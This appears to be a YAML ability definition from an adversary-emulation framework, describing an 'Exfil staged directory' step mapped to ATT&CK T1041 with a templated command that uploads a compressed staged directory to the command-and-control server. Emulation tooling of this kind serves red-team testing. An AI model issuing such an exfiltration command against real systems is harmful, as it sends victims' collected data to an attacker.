---

- id: ea713bc4-63f0-491c-9a6f-0b01d560b87e
  name: Exfil staged directory
  description: Exfil the staged directory
  tactic: exfiltration
  technique:
    attack_id: T1041
    name: Exfiltration Over Command and Control Channel
  platforms:
    MCP:
      Glimpse:
        command: |
          {"CommandName": "file to server", "Inputs": [{"Value": "glimpse_exfil_#{paw}.zip"}, {"Value": "#{host.dir.compress}"}]}
